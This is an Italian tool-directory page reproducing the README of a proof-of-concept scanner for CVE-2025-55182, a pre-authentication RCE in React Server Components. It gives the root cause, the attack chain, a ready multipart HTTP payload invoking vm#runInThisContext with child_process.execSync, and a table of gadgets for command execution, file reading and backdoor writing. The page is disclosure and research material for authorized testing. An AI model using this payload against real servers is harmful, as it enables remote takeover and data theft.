Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-POC-SCANNER — Strumento di ricerca sulla sicurezza unificato | Kitploit
Strumenti/GitHubGitHub/im-hanzou/cve-2025-55182-poc-scanner
RicognizioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingPaper e RicercaApprendimento e FormazioneRed TeamingSviluppo Payload

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHubim-hanzou/cve-2025-55182-poc-scanner

CVE-2025-55182-POC-SCANNER

Strumento di ricerca sulla sicurezza unificato

Vedi Repository
2210 mesi faNon ancora revisionato
Condividi

CVE-2025-55182: RCE Critica Pre-Autenticazione nei React Server Components

CVE-2025-55182 CVSS 10.0 Versioni React Affette Versioni Next.js Affette

Ricerca sulla Sicurezza di schema.cx
"Il controllo è un'illusione. Sono i sistemi che costruiamo a controllarci—a meno che non li comprendiamo prima."


📋 Indice

  • Disclaimer & Avviso Legale
  • Sommario Esecutivo
  • Descrizione Tecnica
  • Sistemi Affetti
  • Proof of Concept
  • Valutazione dell'Impatto
  • Mitigazione e Rimedio
  • Cronologia della Divulgazione Responsabile
  • Riferimenti
  • Attribuzione

⚠️ Disclaimer e Avviso Legale

QUESTO STRUMENTO È SOLO PER TEST DI SICUREZZA AUTORIZZATI

FERMATI. LEGGI QUESTO PRIMA DI PROCEDERE.

Questo repository contiene codice proof-of-concept per una vulnerabilità di sicurezza critica. Accedendo, scaricando o utilizzando qualsiasi materiale in questo repository, riconosci e accetti quanto segue:

Requisiti Legali

  1. Autorizzazione Scritta Richiesta: Devi avere autorizzazione esplicita e scritta dal proprietario del sistema prima di condurre qualsiasi test di sicurezza. Gli accordi verbali sono insufficienti.

  2. Limitazioni di Ambito: I test devono essere limitati ai sistemi esplicitamente elencati nella tua autorizzazione. Lo "scope creep" non è consentito.

  3. Leggi Applicabili: L'accesso non autorizzato a sistemi informatici viola:

    • Stati Uniti: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. § 1030
    • Unione Europea: Direttiva 2013/40/UE sugli attacchi contro i sistemi informativi
    • Regno Unito: Computer Misuse Act 1990
    • Australia: Criminal Code Act 1995, Divisioni 477-478
    • Altre giurisdizioni: Leggi simili sui crimini informatici si applicano a livello globale

Esclusione di Responsabilità

GLI AUTORI E I COLLABORATORI DI QUESTO REPOSITORY:

  • Non accettano ALCUNA responsabilità per l'uso improprio di questo strumento
  • Non forniscono ALCUNA garanzia, esplicita o implicita
  • NON sono responsabili per eventuali danni derivanti dall'uso o dall'incapacità di usare questo software
  • Non approvano attività illegali di alcun tipo

Linee Guida Etiche

  • Non testare mai senza permesso — anche se "vuoi solo controllare"
  • Documenta tutto — mantieni registri dettagliati di tutte le attività di test
  • Minimizza l'impatto — usa i metodi meno invasivi possibili
  • Segnala responsabilmente — segui le pratiche di divulgazione coordinata
  • Rispetta la privacy — non esfiltrare o conservare dati sensibili

"La domanda non è se possiamo sfruttare la vulnerabilità. È se dovremmo farlo, e per quale scopo."


📊 Sommario Esecutivo

CVE-2025-55182 è una vulnerabilità critica di esecuzione remota di codice (RCE) pre-autenticazione che riguarda i React Server Components nelle applicazioni React 19.x e Next.js 15.x-16.x.

Impatto Aziendale

Questa vulnerabilità consente a qualsiasi attaccante non autenticato con accesso di rete a un'applicazione vulnerabile di eseguire comandi arbitrari sul server. L'attacco non richiede credenziali, nessuna interazione dell'utente e può essere completamente automatizzato. Uno sfruttamento riuscito porta a:

  • Compromissione completa del server — gli attaccanti ottengono il controllo totale del sistema sottostante
  • Potenziale violazione dei dati — accesso a database, variabili d'ambiente, segreti e dati utente
  • Movimento laterale — i server compromessi possono essere usati per attaccare reti interne
  • Rischio per la supply chain — i sistemi di produzione che servono milioni di utenti potrebbero essere colpiti

Valutazione della Severità

MetricaValutazione
Punteggio Base CVSS v3.110.0 CRITICO
Vettore d'AttaccoRete
Complessità dell'AttaccoBassa
Privilegi RichiestiNessuno
Interazione UtenteNessuna
Impatto (C/I/D)Alto / Alto / Alto

"Le persone si fidano dei sistemi perché non li capiscono. Quella fiducia è una vulnerabilità."


🔬 Descrizione Tecnica

Analisi della Causa Radice

La vulnerabilità esiste nell'implementazione del protocollo Flight di React all'interno della funzione requireModule. Questa funzione usa la notazione a parentesi per accedere agli esportati del modulo basandosi sull'input controllato dall'utente, senza convalidare che la proprietà richiesta sia una proprietà propria del modulo.

Posizione del Codice Vulnerabile:

react-server-dom-webpack/cjs/react-server-dom-webpack-server.node.development.js
Funzione: requireModule (circa righe 2546-2558 in v19.0.0)

Pattern Vulnerabile:

function requireModule(metadata) {
  var moduleExports = __webpack_require__(metadata[0]);
  // ... gestione asincrona ...
  return moduleExports[metadata[2]];  // ← VULNERABILE: Nessun controllo hasOwnProperty
}

Meccanismo di Sfruttamento

L'attacco sfrutta la traversata della catena dei prototipi di JavaScript:

  1. Punto d'ingresso: L'attaccante invia una richiesta multipart malevola a un endpoint di Server Action
  2. Iniezione del Payload: Il campo $ACTION_0:0 contiene JSON con le proprietà id (formato module#export) e bound (argomenti) controllate dall'attaccante
  3. Accesso al Prototipo: Specificando esportazioni come constructor o accedendo alle proprietà del prototipo, gli attaccanti possono riferirsi a moduli Node.js integrati
  4. Gadget RCE: Funzioni come vm.runInThisContext, child_process.execSync, o fs.readFileSync vengono eseguite con argomenti forniti dall'attaccante

Vettore d'Attacco

HTTP POST /formaction
    ↓
decodeAction(formData, serverManifest)
    ↓
loadServerReference(manifest, value.id, value.bound)
    ↓
resolveServerReference(config, id)  // Analizza il formato "module#export"
    ↓
requireModule(metadata)
    ↓
moduleExports[metadata[2]]  // Accesso alla catena dei prototipi → RCE

Struttura del Payload

POST /api/action HTTP/1.1
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"

------Boundary
Content-Disposition: form-data; name="$ACTION_0:0"

{"id":"vm#runInThisContext","bound":["require('child_process').execSync('whoami').toString()"]}
------Boundary--

Gadget RCE Disponibili

GadgetModuloDescrizioneImpatto
vm#runInThisContextvmEsegue JS nel contesto correnteRCE Diretta
vm#runInNewContextvmEsegue JS in sandbox (aggirabile)RCE Diretta
child_process#execSyncchild_processEsegue comandi shellRCE Diretta
child_process#spawnSyncchild_processAvvia processiRCE Diretta
fs#readFileSyncfsLegge file arbitrariEsfiltrazione Dati
fs#writeFileSyncfsScrive file arbitrariPersistenza/Backdoor
module#_loadmoduleCarica moduli JS (RCE in due passi)RCE Indiretta
Scarica lo strumento